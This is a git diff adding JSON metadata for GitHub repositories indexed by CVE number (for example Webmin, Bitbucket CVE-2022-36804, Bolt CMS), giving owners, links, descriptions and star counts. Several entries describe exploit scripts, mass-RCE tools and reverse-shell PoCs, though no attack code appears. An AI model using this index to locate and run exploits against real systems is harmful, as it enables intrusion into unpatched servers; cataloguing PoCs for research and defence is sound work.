"2023-12-31T06:40:11Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36231.json b/2022/CVE-2022-36231.json new file mode 100644 index 0000000000..1376555cdc --- /dev/null +++ b/2022/CVE-2022-36231.json @@ -0,0 +1,33 @@ +[ + { + "id": 557919955, + "name": "CVE-2022-36231", + "full_name": "affix\/CVE-2022-36231", + "owner": { + "login": "affix", + "id": 184308, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/184308?v=4", + "html_url": "https:\/\/github.com\/affix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/affix\/CVE-2022-36231", + "description": "pdf_info <= 0.5.3 OS Command Injection", + "fork": false, + "created_at": "2022-10-26T14:51:57Z", + "updated_at": "2024-05-03T07:26:58Z", + "pushed_at": "2022-10-26T15:34:10Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36234.json b/2022/CVE-2022-36234.json new file mode 100644 index 0000000000..2511edcf33 --- /dev/null +++ b/2022/CVE-2022-36234.json @@ -0,0 +1,33 @@ +[ + { + "id": 595804172, + "name": "CVE-2022-36234", + "full_name": "Halcy0nic\/CVE-2022-36234", + "owner": { + "login": "Halcy0nic", + "id": 42481692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42481692?v=4", + "html_url": "https:\/\/github.com\/Halcy0nic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Halcy0nic\/CVE-2022-36234", + "description": "Proof of concept for CVE-2022-36234", + "fork": false, + "created_at": "2023-01-31T20:59:35Z", + "updated_at": "2024-07-02T20:33:25Z", + "pushed_at": "2023-07-19T16:13:01Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36267.json b/2022/CVE-2022-36267.json new file mode 100644 index 0000000000..d0960c668b --- /dev/null +++ b/2022/CVE-2022-36267.json @@ -0,0 +1,43 @@ +[ + { + "id": 740704394, + "name": "CVE-2022-36267-PoC", + "full_name": "0xNslabs\/CVE-2022-36267-PoC", + "owner": { + "login": "0xNslabs", + "id": 122338332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122338332?v=4", + "html_url": "https:\/\/github.com\/0xNslabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xNslabs\/CVE-2022-36267-PoC", + "description": "PoC Script for CVE-2022-36267: Exploits an unauthenticated remote command injection vulnerability in Airspan AirSpot 5410 antenna.", + "fork": false, + "created_at": "2024-01-08T22:23:57Z", + "updated_at": "2024-09-13T01:20:33Z", + "pushed_at": "2024-01-08T22:37:55Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "command-injection", + "cve-2022-36267", + "ethical-hacking", + "exploit", + "iot-security", + "lte", + "reverse-shell", + "telecommunications", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 8, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36271.json b/2022/CVE-2022-36271.json new file mode 100644 index 0000000000..39a655f486 --- /dev/null +++ b/2022/CVE-2022-36271.json @@ -0,0 +1,33 @@ +[ + { + "id": 525521767, + "name": "POC-of-CVE-2022-36271", + "full_name": "SaumyajeetDas\/POC-of-CVE-2022-36271", + "owner": { + "login": "SaumyajeetDas", + "id": 66937297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66937297?v=4", + "html_url": "https:\/\/github.com\/SaumyajeetDas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SaumyajeetDas\/POC-of-CVE-2022-36271", + "description": "This is working POC of CVE-2022-36271 ", + "fork": false, + "created_at": "2022-08-16T19:48:36Z", + "updated_at": "2024-08-12T20:26:17Z", + "pushed_at": "2022-09-01T16:43:49Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36432.json b/2022/CVE-2022-36432.json new file mode 100644 index 0000000000..f51080e9c3 --- /dev/null +++ b/2022/CVE-2022-36432.json @@ -0,0 +1,33 @@ +[ + { + "id": 556770744, + "name": "CVE-2022-36432", + "full_name": "afine-com\/CVE-2022-36432", + "owner": { + "login": "afine-com", + "id": 105647610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105647610?v=4", + "html_url": "https:\/\/github.com\/afine-com", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/afine-com\/CVE-2022-36432", + "description": "Cross-site Scripting (XSS) in Preview functionality in Amasty Blog Pro for Magento 2", + "fork": false, + "created_at": "2022-10-24T13:36:09Z", + "updated_at": "2022-10-25T00:46:58Z", + "pushed_at": "2022-10-24T13:50:07Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36433.json b/2022/CVE-2022-36433.json new file mode 100644 index 0000000000..638d034b06 --- /dev/null +++ b/2022/CVE-2022-36433.json @@ -0,0 +1,33 @@ +[ + { + "id": 556776996, + "name": "CVE-2022-36433", + "full_name": "afine-com\/CVE-2022-36433", + "owner": { + "login": "afine-com", + "id": 105647610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105647610?v=4", + "html_url": "https:\/\/github.com\/afine-com", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/afine-com\/CVE-2022-36433", + "description": "Cross-site Scripting (XSS) in blog-post creation functionality in Amasty Blog Pro for Magento 2", + "fork": false, + "created_at": "2022-10-24T13:49:17Z", + "updated_at": "2022-10-25T00:47:02Z", + "pushed_at": "2022-10-24T13:53:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36446.json b/2022/CVE-2022-36446.json new file mode 100644 index 0000000000..b2352542c5 --- /dev/null +++ b/2022/CVE-2022-36446.json @@ -0,0 +1,103 @@ +[ + { + "id": 523702714, + "name": "CVE-2022-36446-Webmin-Software-Package-Updates-RCE", + "full_name": "p0dalirius\/CVE-2022-36446-Webmin-Software-Package-Updates-RCE", + "owner": { + "login": "p0dalirius", + "id": 79218792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79218792?v=4", + "html_url": "https:\/\/github.com\/p0dalirius", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p0dalirius\/CVE-2022-36446-Webmin-Software-Package-Updates-RCE", + "description": "A Python script to exploit CVE-2022-36446 Software Package Updates RCE (Authenticated) on Webmin < 1.997.", + "fork": false, + "created_at": "2022-08-11T11:47:17Z", + "updated_at": "2024-08-21T06:25:25Z", + "pushed_at": "2022-08-23T15:57:41Z", + "stargazers_count": 110, + "watchers_count": 110, + "has_discussions": false, + "forks_count": 35, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-36446", + "exploit", + "package", + "rce", + "software", + "update", + "webmin" + ], + "visibility": "public", + "forks": 35, + "watchers": 110, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 534599250, + "name": "CVE-2022-36446", + "full_name": "emirpolatt\/CVE-2022-36446", + "owner": { + "login": "emirpolatt", + "id": 41807762, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41807762?v=4", + "html_url": "https:\/\/github.com\/emirpolatt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/emirpolatt\/CVE-2022-36446", + "description": "CVE-2022-36446 - Webmin 1.996 Remote Code Execution", + "fork": false, + "created_at": "2022-09-09T10:34:53Z", + "updated_at": "2024-08-12T20:26:53Z", + "pushed_at": "2022-09-09T10:35:09Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 813427958, + "name": "CVE-2022-36446", + "full_name": "Kang3639\/CVE-2022-36446", + "owner": { + "login": "Kang3639", + "id": 118144091, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118144091?v=4", + "html_url": "https:\/\/github.com\/Kang3639", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kang3639\/CVE-2022-36446", + "description": "CVE-2022-36446 POC 실습", + "fork": false, + "created_at": "2024-06-11T04:21:28Z", + "updated_at": "2024-06-11T05:01:36Z", + "pushed_at": "2024-06-11T05:01:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36532.json b/2022/CVE-2022-36532.json new file mode 100644 index 0000000000..f1907fba43 --- /dev/null +++ b/2022/CVE-2022-36532.json @@ -0,0 +1,33 @@ +[ + { + "id": 532793677, + "name": "CVE-2022-36532", + "full_name": "lutrasecurity\/CVE-2022-36532", + "owner": { + "login": "lutrasecurity", + "id": 98662555, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98662555?v=4", + "html_url": "https:\/\/github.com\/lutrasecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lutrasecurity\/CVE-2022-36532", + "description": "Proof of concept for CVE-2022-36532: RCE via File Upload in Bolt CMS 5.1.12 and below.", + "fork": false, + "created_at": "2022-09-05T07:39:23Z", + "updated_at": "2023-04-18T14:35:15Z", + "pushed_at": "2022-09-05T16:08:17Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36537.json b/2022/CVE-2022-36537.json new file mode 100644 index 0000000000..95f6885943 --- /dev/null +++ b/2022/CVE-2022-36537.json @@ -0,0 +1,76 @@ +[ + { + "id": 576253309, + "name": "CVE-2022-36537-EXPLOIT", + "full_name": "agnihackers\/CVE-2022-36537-EXPLOIT", + "owner": { + "login": "agnihackers", + "id": 58265761, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58265761?v=4", + "html_url": "https:\/\/github.com\/agnihackers", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/agnihackers\/CVE-2022-36537-EXPLOIT", + "description": "CVE-2022-36537", + "fork": false, + "created_at": "2022-12-09T11:29:26Z", + "updated_at": "2023-08-04T05:23:48Z", + "pushed_at": "2022-12-12T09:49:03Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounty", + "cve-2022-36537", + "cybersecurity" + ], + "visibility": "public", + "forks": 6, + "watchers": 9, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 576308362, + "name": "CVE-2022-36537", + "full_name": "Malwareman007\/CVE-2022-36537", + "owner": { + "login": "Malwareman007", + "id": 86009160, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86009160?v=4", + "html_url": "https:\/\/github.com\/Malwareman007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Malwareman007\/CVE-2022-36537", + "description": "POC of CVE-2022-36537", + "fork": false, + "created_at": "2022-12-09T14:15:52Z", + "updated_at": "2024-08-12T20:28:47Z", + "pushed_at": "2023-10-18T02:01:03Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "backup-manager", + "cve-2022-36537", + "exploit", + "security", + "vulnerability", + "web3", + "zk-framework" + ], + "visibility": "public", + "forks": 6, + "watchers": 35, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36539.json b/2022/CVE-2022-36539.json new file mode 100644 index 0000000000..f40e2dab8e --- /dev/null +++ b/2022/CVE-2022-36539.json @@ -0,0 +1,33 @@ +[ + { + "id": 533665078, + "name": "CVE-2022-36539", + "full_name": "Fopje\/CVE-2022-36539", + "owner": { + "login": "Fopje", + "id": 4934752, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4934752?v=4", + "html_url": "https:\/\/github.com\/Fopje", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Fopje\/CVE-2022-36539", + "description": "Insecure Permissions WeDayCare", + "fork": false, + "created_at": "2022-09-07T07:58:08Z", + "updated_at": "2024-01-17T16:04:14Z", + "pushed_at": "2022-09-07T08:11:33Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36553.json b/2022/CVE-2022-36553.json new file mode 100644 index 0000000000..a18eee0a7a --- /dev/null +++ b/2022/CVE-2022-36553.json @@ -0,0 +1,41 @@ +[ + { + "id": 740696426, + "name": "CVE-2022-36553-PoC", + "full_name": "0xNslabs\/CVE-2022-36553-PoC", + "owner": { + "login": "0xNslabs", + "id": 122338332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122338332?v=4", + "html_url": "https:\/\/github.com\/0xNslabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xNslabs\/CVE-2022-36553-PoC", + "description": "PoC Script for CVE-2022-36553: Exploits an unauthenticated remote command injection vulnerability in Hytec Inter HWL-2511-SS device.", + "fork": false, + "created_at": "2024-01-08T21:53:46Z", + "updated_at": "2024-03-04T15:23:45Z", + "pushed_at": "2024-01-08T22:39:33Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "command-injection", + "cve-2022-36553", + "ethical-hacking", + "exploit", + "iot-security", + "reverse-shell", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3656.json b/2022/CVE-2022-3656.json new file mode 100644 index 0000000000..8c1fe8b5a5 --- /dev/null +++ b/2022/CVE-2022-3656.json @@ -0,0 +1,33 @@ +[ + { + "id": 588408716, + "name": "CVE-2022-3656", + "full_name": "momika233\/CVE-2022-3656", + "owner": { + "login": "momika233", + "id": 56291820, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56291820?v=4", + "html_url": "https:\/\/github.com\/momika233", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/momika233\/CVE-2022-3656", + "description": null, + "fork": false, + "created_at": "2023-01-13T03:26:14Z", + "updated_at": "2024-08-30T15:13:27Z", + "pushed_at": "2023-01-13T03:35:05Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 38, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36663.json b/2022/CVE-2022-36663.json new file mode 100644 index 0000000000..4999148849 --- /dev/null +++ b/2022/CVE-2022-36663.json @@ -0,0 +1,33 @@ +[ + { + "id": 556017965, + "name": "CVE-2022-36663-PoC", + "full_name": "aqeisi\/CVE-2022-36663-PoC", + "owner": { + "login": "aqeisi", + "id": 84850150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84850150?v=4", + "html_url": "https:\/\/github.com\/aqeisi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aqeisi\/CVE-2022-36663-PoC", + "description": "Internal network scanner through Gluu IAM blind ssrf", + "fork": false, + "created_at": "2022-10-22T21:55:33Z", + "updated_at": "2022-11-02T20:18:42Z", + "pushed_at": "2022-11-02T20:14:54Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36752.json b/2022/CVE-2022-36752.json new file mode 100644 index 0000000000..9134e041b7 --- /dev/null +++ b/2022/CVE-2022-36752.json @@ -0,0 +1,33 @@ +[ + { + "id": 595842528, + "name": "CVE-2022-36752", + "full_name": "Halcy0nic\/CVE-2022-36752", + "owner": { + "login": "Halcy0nic", + "id": 42481692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42481692?v=4", + "html_url": "https:\/\/github.com\/Halcy0nic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Halcy0nic\/CVE-2022-36752", + "description": "Proof of concept for CVE-2022-36752", + "fork": false, + "created_at": "2023-01-31T23:14:06Z", + "updated_at": "2024-07-02T20:34:25Z", + "pushed_at": "2023-01-31T23:51:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36779.json b/2022/CVE-2022-36779.json new file mode 100644 index 0000000000..efd3e71448 --- /dev/null +++ b/2022/CVE-2022-36779.json @@ -0,0 +1,64 @@ +[ + { + "id": 735282415, + "name": "CVE-2022-36779", + "full_name": "rootDR\/CVE-2022-36779", + "owner": { + "login": "rootDR", + "id": 107951097, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107951097?v=4", + "html_url": "https:\/\/github.com\/rootDR", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rootDR\/CVE-2022-36779", + "description": "Exploit for CVE-2022-36779 authenticated Command Injection", + "fork": false, + "created_at": "2023-12-24T10:46:50Z", + "updated_at": "2024-05-27T18:31:19Z", + "pushed_at": "2023-12-24T11:27:56Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 810016226, + "name": "CVE-2022-36779", + "full_name": "EmadYaY\/CVE-2022-36779", + "owner": { + "login": "EmadYaY", + "id": 80041099, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80041099?v=4", + "html_url": "https:\/\/github.com\/EmadYaY", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EmadYaY\/CVE-2022-36779", + "description": "exploit code", + "fork": false, + "created_at": "2024-06-03T22:25:31Z", + "updated_at": "2024-06-03T22:32:34Z", + "pushed_at": "2024-06-03T22:32:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36804.json b/2022/CVE-2022-36804.json new file mode 100644 index 0000000000..9c967c485f --- /dev/null +++ b/2022/CVE-2022-36804.json @@ -0,0 +1,494 @@ +[ + { + "id": 533698492, + "name": "CVE-2022-36804", + "full_name": "notdls\/CVE-2022-36804", + "owner": { + "login": "notdls", + "id": 25024098, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25024098?v=4", + "html_url": "https:\/\/github.com\/notdls", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/notdls\/CVE-2022-36804", + "description": "A real exploit for BitBucket RCE CVE-2022-36804", + "fork": false, + "created_at": "2022-09-07T09:35:49Z", + "updated_at": "2024-08-31T01:26:38Z", + "pushed_at": "2024-08-31T01:26:35Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 35, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 538510407, + "name": "CVE-2022-36804-PoC", + "full_name": "notxesh\/CVE-2022-36804-PoC", + "owner": { + "login": "notxesh", + "id": 49665312, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49665312?v=4", + "html_url": "https:\/\/github.com\/notxesh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/notxesh\/CVE-2022-36804-PoC", + "description": "Multithreaded exploit script for CVE-2022-36804 affecting BitBucket versions <8.3.1", + "fork": false, + "created_at": "2022-09-19T13:15:13Z", + "updated_at": "2023-01-09T12:32:37Z", + "pushed_at": "2022-09-19T13:49:27Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 538761954, + "name": "CVE-2022-36804-MASS-RCE", + "full_name": "JRandomSage\/CVE-2022-36804-MASS-RCE", + "owner": { + "login": "JRandomSage", + "id": 77659133, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77659133?v=4", + "html_url": "https:\/\/github.com\/JRandomSage", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JRandomSage\/CVE-2022-36804-MASS-RCE", + "description": "A critical vulnerability (CVE-2022-36804) in Atlassian Bitbucket Server and Data Center could be exploited by unauthorized attackers to execute malicious code on vulnerable instances. ", + "fork": false, + "created_at": "2022-09-20T01:30:29Z", + "updated_at": "2022-09-23T08:42:48Z", + "pushed_at": "2022-09-10T09:07:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 538779944, + "name": "CVE-2022-36804-PoC-Exploit", + "full_name": "benjaminhays\/CVE-2022-36804-PoC-Exploit", + "owner": { + "login": "benjaminhays", + "id": 106408899, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106408899?v=4", + "html_url": "https:\/\/github.com\/benjaminhays", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/benjaminhays\/CVE-2022-36804-PoC-Exploit", + "description": "Somewhat Reliable PoC Exploit for CVE-2022-36804 (BitBucket Critical Command Injection)", + "fork": false, + "created_at": "2022-09-20T02:35:53Z", + "updated_at": "2023-10-14T03:31:30Z", + "pushed_at": "2023-11-23T03:45:09Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 538923286, + "name": "bitbucket-cve-2022-36804", + "full_name": "Vulnmachines\/bitbucket-cve-2022-36804", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/bitbucket-cve-2022-36804", + "description": "CVE-2022-36804 Atlassian Bitbucket Command Injection Vulnerability", + "fork": false, + "created_at": "2022-09-20T10:08:47Z", + "updated_at": "2023-02-28T15:12:40Z", + "pushed_at": "2022-10-15T06:37:32Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 539432576, + "name": "CVE-2022-36804-POC", + "full_name": "kljunowsky\/CVE-2022-36804-POC", + "owner": { + "login": "kljunowsky", + "id": 104329412, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104329412?v=4", + "html_url": "https:\/\/github.com\/kljunowsky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kljunowsky\/CVE-2022-36804-POC", + "description": "Bitbucket CVE-2022-36804 unauthenticated remote command execution", + "fork": false, + "created_at": "2022-09-21T10:36:50Z", + "updated_at": "2024-08-12T20:27:12Z", + "pushed_at": "2023-01-21T02:14:15Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "atlassian", + "atlassian-bitbucket", + "bitbucket", + "bug-bounty", + "cve-2022-36804", + "exploit", + "hack", + "hacking", + "infosec", + "penetration-testing", + "penetration-testing-tools", + "poc", + "rce", + "security" + ], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 540400573, + "name": "CVE-2022-36804-ReverseShell", + "full_name": "Chocapikk\/CVE-2022-36804-ReverseShell", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2022-36804-ReverseShell", + "description": "PoC exploit for CVE-2022-36804 (BitBucket Critical Command Injection)", + "fork": false, + "created_at": "2022-09-23T11:05:22Z", + "updated_at": "2024-08-12T20:27:15Z", + "pushed_at": "2022-09-24T15:19:38Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 540713828, + "name": "CVE-2022-36804", + "full_name": "khal4n1\/CVE-2022-36804", + "owner": { + "login": "khal4n1", + "id": 38965063, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38965063?v=4", + "html_url": "https:\/\/github.com\/khal4n1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/khal4n1\/CVE-2022-36804", + "description": "You can find a python script to exploit the vulnerability on Bitbucket related CVE-2022-36804.", + "fork": false, + "created_at": "2022-09-24T05:04:30Z", + "updated_at": "2024-06-05T09:03:41Z", + "pushed_at": "2022-10-25T02:39:33Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 540933347, + "name": "CVE-2022-36804-ReverseShell", + "full_name": "0xEleven\/CVE-2022-36804-ReverseShell", + "owner": { + "login": "0xEleven", + "id": 45062245, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45062245?v=4", + "html_url": "https:\/\/github.com\/0xEleven", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xEleven\/CVE-2022-36804-ReverseShell", + "description": "PoC exploit for CVE-2022-36804 (BitBucket Critical Command Injection)", + "fork": false, + "created_at": "2022-09-24T18:46:56Z", + "updated_at": "2024-03-21T18:12:02Z", + "pushed_at": "2022-09-24T15:19:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 541177106, + "name": "cve-2022-36804", + "full_name": "tahtaciburak\/cve-2022-36804", + "owner": { + "login": "tahtaciburak", + "id": 16239725, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16239725?v=4", + "html_url": "https:\/\/github.com\/tahtaciburak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tahtaciburak\/cve-2022-36804", + "description": "A simple PoC for Atlassian Bitbucket RCE [CVE-2022-36804]", + "fork": false, + "created_at": "2022-09-25T13:16:57Z", + "updated_at": "2024-08-12T20:27:19Z", + "pushed_at": "2022-09-25T13:18:20Z", + 